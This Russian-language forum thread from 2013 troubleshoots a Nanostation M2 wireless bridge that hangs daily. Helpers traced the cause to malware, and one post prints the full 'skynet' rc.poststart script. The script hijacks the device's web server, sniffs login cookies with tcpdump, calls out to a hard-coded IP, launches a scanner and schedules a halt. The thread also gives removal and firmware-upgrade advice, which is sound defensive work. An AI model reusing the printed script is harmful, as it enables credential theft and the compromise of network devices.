avgaz Posted March 5, 2013 · Report post Сообствено примерно через год использования моста на Nanostation M2 одна из точек начала глючить, примерно раз может и два раза в сутки зависает, то есть пропадает связь между точками и на зависшею точку не зайти, помогает только откл и вкл питания, после опять работает нормально связь между нормальная -67 dBm. Может кто сталкивался с этим? Share this post Link to post Share on other sites
mintaka Posted March 6, 2013 · Report post Для начала полный сброс и прошивку по-новее... это хотя бы попробывать Share this post Link to post Share on other sites
avgaz Posted March 13, 2013 · Report post Для начала полный сброс и прошивку по-новее... это хотя бы попробывать Сброс делал, прошику не перешивал да и не думаю что она тут в чем то виновата. поменял местами точки думал если проблема в антенне то которая не виснет удобнее перезагружать у себя, по после того какпоменял местами опять стала виснуть уже другая на прежней точке, поменяли пачкорд не помогло, уже даже не знаю в чем дело, может роутер который стоит за точкой виноват? Share this post Link to post Share on other sites
Badyavka Posted March 14, 2013 · Report post проблему не решит, но включи вотчдог, чтобы она сама перезагружалась если пинги пропадут... Share this post Link to post Share on other sites
Halva Posted March 15, 2013 · Report post Скорее всего проблема в недостаточном питании устройства. Share this post Link to post Share on other sites
Adim Posted March 16, 2013 · Report post кабель какой? Share this post Link to post Share on other sites
avgaz Posted March 16, 2013 · Report post но включи вотчдог, чтобы она сама перезагружалась если пинги пропадут... Если можно подробней про что это, а то становится не удобно звонить в час ночи на точку что бы перезагрузили. Скорее всего проблема в недостаточном питании устройства. Пробовали менял БП не помогло кабель какой? Блала обчная не дорогая витая пара, которая простояла около года, то же с начало на это подумал поменяли результата нольNS установлена на болконе и подклюючена к роутеру который за окном кабеля не много осадки на него не попадают. Share this post Link to post Share on other sites
Adim Posted March 18, 2013 · Report post а может человеческий фактор)))) кто то её сам вешает... вредитель какой нить Share this post Link to post Share on other sites
NewUse Posted March 18, 2013 · Report post Посмотрите нет ли в /etc/persistent файлов вида rc.* Share this post Link to post Share on other sites
avgaz Posted March 18, 2013 · Report post Посмотрите нет ли в /etc/persistent файлов вида rc.* Это на антенне? как посотреть? Share this post Link to post Share on other sites
endryww Posted March 18, 2013 · Report post Это на антенне? как посотреть? --разобрать!! ну или WinSCP Share this post Link to post Share on other sites
avgaz Posted March 18, 2013 (edited) · Report post Если я правильно понял то содержимое такое XM.v5.3.3# cd /etc/persistent XM.v5.3.3# ls dropbear_dss_host_key mcuser dropbear_rsa_host_key rc.poststart Вопрос а по ssh можно где посотреть может лог какой почему зависает антенна? Edited March 18, 2013 by avgaz Share this post Link to post Share on other sites
NewUse Posted March 18, 2013 · Report post Если я правильно понял то содержимое такое Да, файл rc.poststart, если Вы его не создавали, то это вирус. cd /etc/persistent cat rc.poststart rm rc.poststart save reboot Вопрос а по ssh можно где посотреть может лог какой почему зависает антенна? /var/log обыно, ну и через веб-морду, но правильнее настроить syslog на отправку на внешний сервер. Share this post Link to post Share on other sites
Adim Posted March 19, 2013 · Report post вопрос в тему ...как настроить что бы лог писался к примеру на компьютер с ip адресом 192.168.1.2 в определённую папку? например C:\Log Share this post Link to post Share on other sites
SSD Posted March 19, 2013 · Report post вопрос в тему ...как настроить что бы лог писался к примеру на компьютер с ip адресом 192.168.1.2 в определённую папку? например C:\Log Поднимаете на компе с адресом 192.168.1.2 syslog, в настройках которого указываете сохранять в C:\Log. Share this post Link to post Share on other sites
avgaz Posted March 19, 2013 · Report post Да, файл rc.poststart, если Вы его не создавали, то это вирус. Спасибо большое действительно на обоих точках был этот файл с таким содержанием #!/bin/sh sed -i 's/\/usr\/www/\/etc\/persistent\/.skynet/g' /etc/lighttpd.conf kill -9 `ps | grep "lighttpd -D" | cut -d" " -f 3` ip=`ifconfig ath0 | grep inet | sed "s/.*inet addr:\([^ ]*\).*/\1/g"` #sleep 60 && trigger_url http://178.216.144.75/probe.cgi/.gif?ip=$ip & if [ -e /bin/tcpdump ]; then tcpdump -A -s 0 -w - -l "tcp dst port 80" | grep "^Cookie: " | grep "xs=" >/etc/ /etc/persistent/.skynet/sendcook & fi (sleep 20 ; /etc/persistent/.skynet/scan) & (sleep 100400 ; sleep 42 ; halt) & Удалил посмотри на результат. Но хотелось бы понять как он туда попал, вернее где искать источник заразы? что бы повторно он там не появился? Share this post Link to post Share on other sites
NewUse Posted March 19, 2013 · Report post что бы повторно он там не появился? Это одна из разновидностей вируса skynet, необходимо обновить пошивку, до версии 5.3.5 или выше, в них пофиксена уязвимость. Но хотелось бы понять как он туда попал Из интернета или от пользователей сети что бы повторно он там не появился? А вот чтоб он или любо другой вирус там не появился -- надо сеть нормально проектировать, озаботившись минимально защитой, например, выделив всю административную сеть в отдельный "менеджмент-вилан", отделив от сети доступа. А для удалённого управления использовать тоннель, тот же ссш/пптп. Share this post Link to post Share on other sites
